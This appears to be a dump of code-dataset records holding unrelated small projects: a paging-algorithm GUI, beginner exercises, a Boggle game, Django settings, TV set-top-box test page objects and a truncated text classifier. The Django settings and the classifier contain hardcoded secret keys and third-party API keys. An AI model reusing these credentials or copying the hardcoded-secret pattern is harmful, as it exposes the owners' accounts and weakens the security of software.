algo_no.upper()==ex_algo[-1] :\n \tt=1\n else :\n\t ex_size.append(mem_size)\n\t ex_qu.append(temp_str)\n\t ex_que_size.append(len(temp_str))\n\t ex_algo.append(algo_no.upper())\n\t ex_page_faults.append(ans)\n\t ex_ans.append(ans1)\n\t ex_str.append(ex_final)\n\n else:\n if mem_size == \"\" or algo_no == \"\":\n mbox.showerror('Error', 'Please Enter Required Information!!')\n else:\n mbox.showinfo('Error', 'Process String Should Contain Numbers only!!')\n\n\ndef startAlgo():\n global var1\n global var2\n global var3\n global lbl1\n global lbl2\n global lbl3\n label = Label(\n paging,\n text=\"Page Replacement Algorithms\",\n font=(\"Arial Bold\", 50),\n width=100,\n bg=\"Bisque\",\n fg=\"darkred\",\n pady=30)\n label.pack()\n lb1 = Label(\n paging,\n text=\"Enter Frame Size : \",\n font=(\"Arial Bold\", 20),\n bg=\"linen\",\n fg=\"darkred\")\n lb2 = Label(paging,\n text=\"Enter Algorithm : \",\n font=(\"Arial Bold\", 20),\n bg=\"linen\",\n fg=\"darkred\")\n lb3 = Label(paging,\n text=\"Enter Process String : \",\n font=(\"Arial Bold\", 20),\n bg=\"linen\",\n fg=\"darkred\")\n lb1.place(x=50, y=150)\n lb2.place(x=50, y=200)\n lb3.place(x=50, y=360)\n\n var1 = StringVar()\n data = (\n \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\", \"19\", \"20\")\n ms = Combobox(paging, values=data, textvariable=var1, font=(\"Arial Bold\", 20), width=19, state=\"readonly\")\n ms.place(x=370, y=150)\n\n var2 = StringVar()\n var2.set(\"First In First Out\")\n fifo = Radiobutton(paging, text=\"First In First Out\", variable=var2, value=\"fifo\", bg=\"linen\", fg=\"darkred\",\n font=(\"Arial Bold\", 15))\n lru = Radiobutton(paging, text=\"Least Recently Used\", variable=var2, value=\"lru\", bg=\"linen\", fg=\"darkred\",\n font=(\"Arial Bold\", 15))\n opt = Radiobutton(paging, text=\"Optimal Page Replacement\", variable=var2, value=\"opr\", bg=\"linen\", fg=\"darkred\",\n font=(\"Arial Bold\", 15))\n fifo.place(x=370, y=200)\n lru.place(x=370, y=250)\n opt.place(x=370, y=300)\n\n var3 = StringVar()\n al = Entry(paging, textvariable=var3, width=20, font=(\"Arial Bold\", 20)).place(x=370, y=360)\n\n btn = Button(paging,\n text=\"Calculate\",\n font=(\"Arial Bold\", 18),\n bg=\"darkred\",\n fg=\"Bisque\",\n cursor=\"hand2\",\n command=get_values)\n btn.pack(pady=(270, 20))\n\n t1 = Label(paging,\n text=\"Page Fault : \",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n width=100,\n height=1,\n fg=\"darkred\",\n pady=7\n )\n t1.pack()\n t2 = Label(paging,\n text=\"Page Hit : \",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n width=100,\n height=1,\n fg=\"darkred\",\n pady=7\n )\n t2.pack()\n lbl1 = Label(paging,\n text=\"0\",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n fg=\"darkred\")\n lbl1.place(x=620, y=490)\n lbl2 = Label(paging,\n text=\"0\",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n fg=\"darkred\")\n lbl2.place(x=620, y=540)\n lbl3 = Label(paging,\n text=\"\",\n font=(\"Arial Bold\", 15),\n bg=\"Bisque\",\n fg=\"darkred\",\n width=85,\n height=1,\n pady=10\n )\n lbl3.place(x=0, y=585)\n\n\ndef destroyHome():\n label.destroy()\n cal_instruction.destroy()\n btn_cal.destroy()\n about.destroy()\n startAlgo()\n\n\npaging = Tk()\npaging.geometry(\"1000x650\")\npaging.configure(bg=\"linen\")\npaging.resizable(0, 0)\n# paging.iconbitmap('i1.ico')\npaging.title(\"Page Replacement Algorithms\")\n\n\nif not os.path.exists(\"Paging.csv\"):\n ex_algo.append('Algorithm Used')\n ex_size.append('Frame Size')\n ex_que_size.append('String Length')\n ex_qu.append('Process String')\n ex_page_faults.append('Page Faults')\n ex_ans.append('Page Hit')\n ex_str.append('String')\nlabel = Label(\n paging,\n text=\"Page Replacement Algorithms\",\n font=(\"Arial Bold\", 50),\n width=100,\n bg=\"Bisque\",\n fg=\"darkred\",\n pady=30\n)\nlabel.pack()\n\ncal_instruction = Label(\n paging,\n text=\"Read How To Calculate Page Replacement Algorithms\\n & \\nClick Here To Calculate It.\",\n bg=\"linen\",\n font=(\"Arial Bold\", 20),\n justify=\"center\",\n pady=30\n)\ncal_instruction.pack()\nbtn_cal = Button(\n paging,\n text=\"Calculate\",\n font=(\"Arial Bold\", 35),\n command=destroyHome,\n width=10,\n height=1,\n bg=\"darkred\",\n fg=\"Bisque\",\n cursor=\"hand2\")\nbtn_cal.pack(pady=(10, 20))\n\nabout = Label(\n paging,\n text=\"Enter Paging Replacement Algorithm Which you want Calculate, \\nEnter Process String and Size of Main Memory.\\nAnd then Click on Calculate Button.\",\n width=100,\n height=50,\n font=(\"Arial Bold\", 20),\n bg=\"Bisque\",\n fg=\"darkred\",\n pady=30\n)\nabout.pack()\n\npaging.protocol(\"WM_DELETE_WINDOW\", on_closing)\npaging.mainloop()","repo_name":"YashThakkar27/Paging-Algorithm","sub_path":"Paging.py","file_name":"Paging.py","file_ext":"py","file_size_in_byte":7855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33712386554","text":"# def season(hemisferio, dia, mes):\r\n# if hemisferio == 0 and mes >= 6 and mes <= 9:\r\n# print(\"VERAO\")\r\n# elif hemisferio == 0 and dia > 20 and mes >= 9 and mes <= 12:\r\n# print(\"OUTONO\")\r\n# elif hemisferio == 0 and dia > 20 and mes >= 12 and mes <= 3:\r\n# print(\"INVERNO\")\r\n# elif hemisferio == 0 and dia > 20 and mes >= 3 and mes <= 6:\r\n# print(\"PRIMAVERA\")\r\n\r\n# elif hemisferio == 1 and dia > 20 and mes >= 12 and mes <= 3:\r\n# print(\"VERAO\")\r\n# elif hemisferio == 1 and dia > 20 and mes >= 3 and mes <= 6:\r\n# print(\"OUTONO\")\r\n# elif hemisferio == 1 and dia > 20 and mes >= 6 and mes <= 9:\r\n# print(\"INVERNO\")\r\n# elif hemisferio == 1 and dia > 20 and mes >= 9 and mes <= 12:\r\n# print(\"PRIMAVERA\")\r\n\r\n# #\r\n# #\r\n# #\r\n\r\n# hemisferio = int(input())\r\n# dia = int(input())\r\n# mes = int(input())\r\n\r\n# season(hemisferio, dia, mes)\r\n\r\n\r\ndef EstacaoAno(dia, mes):\r\n if mes in (1, 2):\r\n return 'VERAO'\r\n elif mes == 3:\r\n if dia < 21:\r\n return 'VERAO'\r\n else:\r\n return 'OUTONO'\r\n elif mes in (4, 5):\r\n return 'OUTONO'\r\n elif mes == 6:\r\n if dia < 21:\r\n return 'OUTONO'\r\n else:\r\n return 'INVERNO'\r\n elif mes in (7, 8):\r\n return 'INVERNO'\r\n elif mes == 9:\r\n if dia < 21:\r\n return 'INVERNO'\r\n else:\r\n return 'PRIMAVERA'\r\n elif mes in (10, 11):\r\n return 'PRIMAVERA'\r\n elif mes == 12:\r\n if dia < 21:\r\n return 'PRIMAVERA'\r\n else:\r\n return 'VERAO'","repo_name":"GuuiBeta/python_programs","sub_path":"Python The Huxley/Questionário 5/Ex5-06.py","file_name":"Ex5-06.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19386974569","text":"import sys\nfrom math import pi\nr = float(sys.argv[1])\na = 2 * r\nb = 2 * pi * r\nc = pi * (r**2)\ncadena = input(\"eliga una opción 1-4 \")\ncadena = float(cadena)\nif cadena == 1:\n print(\"El diámetro de la circunferencia es\",a)\nif cadena == 2:\n print(\"El perímetro de la cicunferencia es\",b)\nif cadena == 3:\n print(\"El área del circulo es\",c)\nif cadena == 4:\n print(\"saliendo\")\nif cadena != 1 and cadena != 2 and cadena != 3 and cadena != 4:\n print(\"Opción no válida\")\n","repo_name":"nefmen/Programas-python-ejercicios","sub_path":"Clase/ejercicio6.py","file_name":"ejercicio6.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37609163688","text":"import unittest\nfrom os.path import join\n\nimport viscojapan as vj\n\n__author__ = 'zy'\n\n\nclass Test_slip_overviewer(vj.MyTestCase):\n def setUp(self):\n self.this_script = __file__\n super().setUp()\n\n def test_plot(self):\n res_file = '/home/zy/workspace/viscojapan/tests/share/nrough_05_naslip_11.h5'\n reader = vj.inv.ResultFileReader(res_file)\n slip = reader.get_slip()\n\n plotter = vj.slip.plot.plot_slip_overview(\n slip,\n join(self.outs_dir, 'slip_history.pdf')\n )\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zy31415/viscojapan","sub_path":"tests/lib/viscojapan/slip/plot/test_plot_slip_overview.py","file_name":"test_plot_slip_overview.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"33475023555","text":"pattern_mal_cargo = {'Количество паллет (шт)': [4, 6],\n 'Габариты': {'Длинa кузова(м)': [2, 4], 'Ширина кузова(м)':[1.8,2],'Высота кузова(м)':[1.8,2.4]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_sr_cargo = {'Количество паллет (шт)': [12, 18],\n 'Габариты': {'Длинa кузова(м)': [3.5, 7.2], 'Ширина кузова(м)':[1.9, 2.45],'Высота кузова(м)':[1.9, 2.7]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_bol_cargo = {'Количество паллет (шт)': [20, 33],\n 'Габариты': {'Длинa кузова(м)': [5.8, 8], 'Ширина кузова(м)':[2.3, 2.45],'Высота кузова(м)':[2.2, 2.7]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_ochbol_cargo = {'Количество паллет (шт)': [33, 50],\n 'Габариты': {'Длинa кузова(м)': [13.6, 16], 'Ширина кузова(м)':[2.4, 2.5],'Высота кузова(м)':[2.5, 3.1]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_cargo = {'Количество мест': [2,3],\n 'Грузоподъемность': {'малый (0.5-2т)': pattern_mal_cargo,\n 'средний (2-5т)': pattern_sr_cargo,\n 'большой(5-16т)': pattern_bol_cargo,\n 'сверхтяжелый(от 16т)': pattern_ochbol_cargo}}\n\n\npattern_bus = {'Количество мест': [40, 150],\n 'Габариты': {'Длинa кузова(м)': [4.5,20], 'Ширина кузова(м)':[1.5, 2.55],'Расстояние от подвески до земли(см)':[15, 20]},\n 'Масса(т)': [10, 28],\n 'Рабочий объем двигателя(л)': [2, 4.43],\n 'Максимальная скорость(км/ч)': [60, 120]}\npattern_pas = {'Количество мест': [2, 8],\n 'Габариты': {'Длинa кузова(м)': [3.8,6.1], 'Ширина кузова(м)':[1.5, 2.55],'Расстояние от подвески до земли(см)':[15, 20]},\n 'Масса(т)': [1, 2.5],\n 'Рабочий объем двигателя(л)': [1, 15],\n 'Максимальная скорость(км/ч)': [60, 300]}\npattern_passenger = {'Тип пассажирского транспорта':{'автобус': pattern_bus,'легковой': pattern_pas}}\n\n\npattern_cargo_passenger = {'Количество мест': [5, 12],\n 'Габариты': {'Длинa кузова(м)': [2, 8], 'Ширина кузова(м)':[1.8, 2.5],'Расстояние от подвески до земли(см)':[15, 20]},\n 'Масса(т)': [4, 9],\n 'Рабочий объем двигателя(л)': [2,12],\n 'Максимальная скорость(км/ч)': [60, 95]}\n\n\npattern_special = {'Количество мест': [],\n 'Габариты': {'Длинa кузова(м)': [], 'Ширина кузова(м)':[],'Расстояние от подвески до земли(см)':[]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n","repo_name":"lizsimenia/machine-accounting","sub_path":"functional/pattern_cars.py","file_name":"pattern_cars.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5686390128","text":"# -*- coding: utf-8 -*-\nimport sys\nimport json\nimport argparse\n\nimport nicfit\n\nfrom .. import Identity, IdentityChain\nfrom .utils import prompt\nfrom ..common import thumbprint, newJwk, jwkIsPrivate\n\n\n@nicfit.command.register\nclass identity(nicfit.Command):\n HELP = \"Identity and stuffs\"\n\n def _initArgParser(self, parser):\n parser.add_argument(\"-i\", \"--identity\", default=None,\n type=argparse.FileType('r'),\n help=\"File containing an Identity in JSON format.\")\n parser.add_argument(\"-k\", \"--keyfile\", default=None,\n type=argparse.FileType('r'),\n help=\"File containing a private JWK.\")\n parser.add_argument(\"--iss\", default=None,\n help=\"Identity issuer.\")\n\n def _run(self):\n if self.args.identity:\n ident = Identity.fromJson(json.loads(self.args.identity.read()))\n else:\n if self.args.keyfile:\n try:\n jwk = json.loads(self.args.keyfile.read())\n key = newJwk(**jwk)\n if not jwkIsPrivate(key):\n raise ValueError(\n \"Key file does not contain a private key\")\n except Exception as ex:\n print(\"Error loading key: \" + str(ex), file=sys.stderr)\n return 1\n key._params[\"kid\"] = thumbprint(key)\n else:\n key = Identity.generateKey()\n\n iss = self.args.iss or prompt(\"iss? \")\n ident = Identity(iss, key)\n\n ident.idchain = IdentityChain.fromIdentity(ident,\n ident.acct).serialize()\n print(json.dumps(ident.toJson(private=True), indent=2, sort_keys=True))\n\n idchain = IdentityChain.deserialize(ident.idchain)\n print(\"\\n## IdentityChain ##:\\n\" + str(idchain))\n","repo_name":"nicfit/Clique","sub_path":"clique/app/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"5767031042","text":"# Hackaton Challange 2\nfrom random import choice\nimport time\nfilename = \"Dictionary.txt\" #Check that the name is tha same, mine might be different\nfile = open(filename,\"r\")\nraw = file.read()\ndictionaryToCompare={}\nplayer_answers = []\nkeyToAdd = \"\"\npoints = 0\n#load dictionary\nfor k in range(len(raw)):\n\tif raw[k] != raw[2]: #raw[2] is the character that devides my words\n\t\tkeyToAdd += raw[k]\n\telse:\n\t\tdictionaryToCompare[keyToAdd] = 0\n\t\tkeyToAdd = \"\"\n\t\t#print(dictionaryToCompare)\n\n\n#Dices definition\n\ndices = [\n\t\t\t['A','A','E','E','G','N'],\n\t\t\t['E','L','R','T','T','Y'],\n\t\t\t['A','O','O','T','T','W'],\n\t\t\t['A','B','B','J','O','O'],\n\t\t\t['E','H','R','T','V','W'],\n\t\t\t['C','I','M','O','T','U'],\n\t\t\t['D','I','S','T','T','Y'],\n\t\t\t['E','I','O','S','S','T'],\n\t\t\t['D','E','L','R','V','Y'],\n\t\t\t['A','C','H','O','P','S'],\n\t\t\t['H','I','M','N','Q','U'],\n\t\t\t['E','E','I','N','S','U'],\n\t\t\t['E','E','G','H','N','W'],\n\t\t\t['A','F','F','K','P','S'],\n\t\t\t['H','L','N','N','R','Z'],\n\t\t\t['D','E','I','L','R','X']]\n\n# Roll dices\nboard=[\n\t\t[\" \",\" \",\" \",\" \"],\n\t\t[\" \",\" \",\" \",\" \"],\n\t\t[\" \",\" \",\" \",\" \"],\n\t\t[\" \",\" \",\" \",\" \"]\n\t\t]\n\ndef rollDices(board):\n\tchoices_dices=[i for i in range(0,16)] #creates an array of numbers until 15\n\tchoices_face =[j for j in range(0,6)]\n\tfor i in range (0,4):\n\t\tfor j in range(0,4):\n\t\t\tdice_index= choice(choices_dices)\n\t\t\tdice_face = choice(choices_face)\n\t\t\tboard[i][j] = dices[dice_index][dice_face]\n\t\t\tchoices_dices.remove(dice_index) # this dice was already rolled\n\t\t\t\n\ndef print_board(a_board):\n\trow_toprint = \" \"\n\tfor i in range(len(a_board)):\n\t\tfor j in range(len(a_board[1])):\n\t\t\trow_toprint += (a_board[i][j]) + \" \"\n\t\tprint (row_toprint)\n\t\trow_toprint = \" \"\n\n\nrollDices(board)\nprint_board(board)\n\ntime_end = time.time() + (60) #Change the time range\n\n\nwhile time.time() < time_end:\n\tnew_word = input(\"Type a word: \")\n\tplayer_answers.append(new_word)\n\ndef lookForWord(thisWord,this_letter,thisBoard,x,y):\n\t#print(thisBoard)\n\t#print(thisWord,this_letter,x,y)\n\tif (x< len(thisBoard) and y< len(thisBoard)):\n\t\tif(x>= 0 and y >= 0):\n\t\t\tif (thisBoard[x][y] != thisWord[this_letter]):\n\t\t\t\treturn False # no estoy segura de esto\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\tu = True\n\tif(this_letter= 5):\n\t\t\t\tpoints +=3\n\t\t\t\tprint(player_answers[word] + \" is correct, you get 3 point for this word\")\n\nprint (\"your score is: \" + str(points) + \" points.\")\n\n\n\n\n","repo_name":"maguileracanon/SummerOfCode","sub_path":"Week2/Hackaton.py","file_name":"Hackaton.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"866208898","text":"from pathlib import Path\nimport os\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'dq_s@_7zbz4k4ws=_(&_asg#*!_gsyrl%(lr!ky8rsh$&1n6ew'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\nALLOWED_HOSTS = ['0.0.0.0', 'localhost', '127.0.0.1']\n\n# Application definition\nDEFAULT_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\n\nPROJECT_APPS = [\n 'accounts',\n 'blog',\n]\n\nCOMMON_APPS = [\n # allauth\n 'allauth',\n # 'allauth.account',\n 'allauth.socialaccount',\n\n 'sass_processor',\n\n # provider\n 'allauth.socialaccount.providers.kakao',\n]\n\nSASS_PROCESSOR_ENABLED = True\nSASS_PROCESSOR_ROOT = os.path.join(BASE_DIR, 'static')\nSASS_PRECISION = 8\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'sass_processor.finders.CssFinder',\n)\n\nINSTALLED_APPS = DEFAULT_APPS + PROJECT_APPS + COMMON_APPS\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'sns.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'sns/templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'sns.wsgi.application'\n\n# Database\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n}\n\n# Password validation\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'Asia/Seoul'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\nSTATIC_URL = '/static/'\n\nSITE_ID = 1\n\nAUTH_USER_MODEL = 'accounts.User'\n\nAUTHENTICATION_BACKENDS = [\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n]\n\n# static\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n# media\n# MEDIA_ROOT = os.path.join(Path(__file__).resolve().parent.parent, \"uploads\")\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\nSOCIALACCOUNT_PROVIDERS = {\n 'kakao': {\n 'APP': {\n 'client_id': 'd01f306c90eda69601dda10cdf62631e',\n 'secret': '492230',\n 'key': '',\n }\n }\n}\n","repo_name":"oereo/SNS-project","sub_path":"sns/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35041305644","text":"# -*- coding: utf-8 -*-\nimport re\nimport time\n\nimport stbt\n\nfrom common.exceptions import NotInScreen\nfrom common.pages.guia import page_guia\nfrom common.pages.home import page_home\nfrom common.pages.pin import page_pin\nfrom common.utils.rcu import RCU\nfrom common.utils.navigation_utils import send_num_rcu_keys\n\n\nclass Img:\n \"\"\"List of reference images locators\"\"\"\n\n MINIGUIDE = \"./images/en_vivo_mini_guide.png\"\n PROGRESS_BAR = \"./images/en_vivo_progress_bar.png\"\n CHANNEL_FOCUS = \"./images/en_vivo_channel_focus.png\"\n ENVENTANAR_FOCUS = \"./images/en_vivo_enventanar_focus.png\"\n SUGERENCIAS_FOCUS = \"./images/en_vivo_sugerencias_focus.png\"\n MINIGUIDE_FOCUS = \"./images/en_vivo_mini_guide_focus.png\"\n PAUSE_ICON = \"./images/en_vivo_pause.png\"\n SUGERENCIAS_ICON = \"./images/en_vivo_sugerencias_icon.png\"\n ENVENTANAR_ICON = \"./images/en_vivo_enventanar_icon.png\"\n GRABAR_ICON = \"./images/en_vivo_grabar.png\"\n HD_ICON = \"./images/en_vivo_hd.png\"\n INICIAR_ICON = \"./images/en_vivo_iniciar.png\"\n OK_ICON = \"./images/en_vivo_ok.png\"\n PARENTAL_TP = \"./images/en_vivo_parental_TP.png\"\n PARENTAL_07 = \"./images/en_vivo_parental_7.png\"\n PARENTAL_12 = \"./images/en_vivo_parental_12.png\"\n PARENTAL_16 = \"./images/en_vivo_parental_16.png\"\n PARENTAL_18 = \"./images/en_vivo_parental_18.png\"\n MOTION_MASK = \"./images/en_vivo_motion_mask.png\"\n\n\nparental_list = [\n Img.PARENTAL_TP,\n Img.PARENTAL_07,\n Img.PARENTAL_12,\n Img.PARENTAL_16,\n Img.PARENTAL_18,\n]\n\n\nclass EnVivo(stbt.FrameObject):\n \"\"\"Page Object for EnVivo\n\n When instantiated, an image capture is done and\n de property is_visible is set to True if we are\n in EnVivo page.\n \"\"\"\n\n def __bool__(self):\n return self.is_visible\n\n def __repr__(self):\n if self.is_visible:\n return \"EnVivo(is_visible=True)\"\n else:\n return \"EnVivo(is_visible=False)\"\n\n @property\n def is_visible(self):\n \"\"\"Returns True if in EnVivo page\"\"\"\n\n region1 = stbt.Region(300, 525, width=45, height=40)\n\n region2 = stbt.Region(308, 640, width=660, height=75)\n\n bar = stbt.match(Img.ROGRESS_BAR, frame=self._frame, region=region1)\n\n ok = stbt.match(Img.OK_ICON, frame=self._frame, region=region2)\n\n return bar and ok\n\n @property\n def parental(self):\n \"\"\"Returns parental if found\n\n Returns:\n string: parental rate\n \"\"\"\n for parental in parental_list:\n if stbt.match(\n parental,\n frame=self._frame,\n region=stbt.Region(244, 470, width=750, height=70),\n ):\n return re.findall(r\"\\d{1,2}|TP\", parental)[0]\n\n return None\n\n @property\n def channel_number(self):\n \"\"\"Returns channel number if found\n\n Returns:\n int: channel\n \"\"\"\n ch = stbt.ocr(region=stbt.Region(77, 505, width=135, height=55))\n\n try:\n return int(ch)\n except ValueError:\n return None\n\n\ndef is_visible():\n \"\"\"Check if in EnVivo Miniguide\n\n Returns:\n [boolean]: [Returns True if in EnVivo]\n \"\"\"\n en_vivo = EnVivo()\n\n if not en_vivo.is_visible:\n stbt.press(RCU.OK)\n time.sleep(1)\n\n en_vivo = en_vivo.refresh()\n\n return en_vivo.is_visible\n\n\ndef assert_screen():\n \"\"\"Raises Exception if not in EnVivo\n\n Returns:\n [obj]: [Returns instance of page]\n \"\"\"\n if is_visible():\n page = EnVivo()\n return page\n else:\n raise NotInScreen(__name__)\n\n\ndef parental():\n \"\"\"Returns the parental rating of the live event.\"\n Checks if is in live (miniguide).\n If not, tries to open miniguide.\n\n Gets parental rating from miniguide:\n - TP\n - 7\n - 12\n - 16\n - 18\n\n Returns:\n string: parental rate\n \"\"\"\n screen = assert_screen()\n\n return screen.parental\n\n\ndef zap_to_ch(ch, unblock=True, pin=None):\n \"\"\"Zaps to desired channel from live\n\n Args:\n ch (list): int channel number\n unblock (bool, optional): True if willing to try to unblock channel.\n Defaults to True.\n pin (list, optional): list of ints with pin (Ex: [1,1,1,1]). Defaults to None.\n\n Returns:\n boolean: True if matches desired channel\n \"\"\"\n\n digit_list = [int(i) for i in str(ch)]\n\n assert len(digit_list) <= 3, \"Invalid number of digits. Must be lowee than 4 digits\"\n\n go_to_live()\n\n assert_screen()\n\n send_num_rcu_keys(digit_list)\n\n time.sleep(5)\n\n _check_live_state(unblock, pin)\n\n if get_channel_number() == ch:\n stbt.draw_text(\n \"SUCCESS: TARGET CH {}, CURRENT CH {},\".format(ch, get_channel_number())\n )\n stbt.press_and_wait(\n RCU.EXIT,\n region=stbt.Region(310, 645, width=60, height=70),\n stable_secs=0.5,\n )\n return True\n else:\n stbt.draw_text(\n \"FAIL: TARGET CH {}, CURRENT CH {}\".format(ch, get_channel_number())\n )\n stbt.press_and_wait(\n RCU.EXIT,\n region=stbt.Region(310, 645, width=60, height=70),\n stable_secs=0.5,\n )\n return False\n\n\ndef go_to_live(unblock=True, pin=None):\n \"\"\"Go to live if accessible from Home Screen\n Allows unblock channel if detects PIN screen is disabled\n If unblock=True and pin is None, default pin is inserted\n\n Args:\n unblock (bool, optional): True if willing to try to unblock channel.\n Defaults to True.\n pin (list, optional): list of ints with pin (Ex: [1,1,1,1]). Defaults to None.\n \"\"\"\n\n if page_home.go_to_home():\n stbt.press_and_wait(\n RCU.MENU,\n region=stbt.Region(310, 645, width=60, height=70),\n stable_secs=0.5,\n )\n _check_live_state(unblock, pin)\n\n\ndef get_channel_number():\n \"\"\"Returns channel number from miniguide if OCR has succeeded\n\n Returns:\n int: channel number\n \"\"\"\n return page_guia.open_guide_get_channel_number()\n\n\ndef assert_motion():\n \"\"\"Check if there is motion in screen to confirm live ch is playing\n\n Returns:\n MotionResult: contains bool variable \"motion\"\n \"\"\"\n return stbt.wait_for_motion(\n timeout_secs=10,\n consecutive_frames=None,\n noise_threshold=None,\n mask=Img.MOTION_MASK,\n frames=None,\n )\n\n\ndef _check_live_state(unblock, pin):\n \"\"\"Handles if channel is blocked before checking live screen\n\n Args:\n unblock (bool): True if we want to unblock channel if it is blocked\n pin (list): 4-digit int PIN\n\n Raises:\n NotInScreen: If not in Live screen\n \"\"\"\n try:\n assert_screen()\n except NotInScreen:\n if _is_channel_blocked() and unblock is True:\n stbt.draw_text(\"Channel is blocked\")\n if not _unblock_channel(pin):\n raise NotInScreen(__name__)\n assert_screen()\n\n elif _is_channel_blocked() and unblock is False:\n stbt.draw_text(\"Channel is blocked\")\n stbt.press_and_wait(RCU.EXIT)\n assert_screen()\n\n else:\n raise NotInScreen(__name__)\n\n\ndef _is_channel_blocked():\n \"\"\"Check if channel is blocked using Page Pin class\n\n Returns:\n True: if blocked. Flase otherwise\n \"\"\"\n return True if page_pin.is_visible() else False\n\n\ndef _unblock_channel(pin=None):\n \"\"\"Access Page Pin to unblock channel\n\n Args:\n pin (list, optional): 4-digit int list. Defaults to None.\n\n Returns:\n [bool]: True if unblocked, False otherwise\n \"\"\"\n page_pin.insert_pin(pin)\n return not page_pin.is_pin_incorrect()\n","repo_name":"bittersoftware/stb-tester-automation","sub_path":"common/pages/en_vivo/page_en_vivo.py","file_name":"page_en_vivo.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42030982813","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport requests\nimport sys\nsys.path.append('..\\Clasificador')\n#print(sys.path)\n\nfrom monkeylearn import MonkeyLearn\n\n# We define the variables need to call the API\napi = 'http://api.meaningcloud.com/class-1.1'\nkeyNoticias = '05ed9a7c754aeee5d5f99470a756a5f8'\nmodelNews = 'news'\nkeyTwitter = 'cd92195fe6c9cc401ab69109099798aa'\nmodelTwitter = 'tweets'\n\nmlZona = MonkeyLearn('aaa6317e0336ea1698db5d01c2aed231abd4c1a1')\n\nclass ClasificadorClass:\n \n def parseoCategoria(self, codigo):\n \tc = \"\"\n \tif codigo == \"1\":\n \t\tc = \"Desastres y accidentes\"\n \tif codigo == \"2\":\n \t\tc = \"Contaminación\" \t\t\n \tif codigo == \"3\":\n 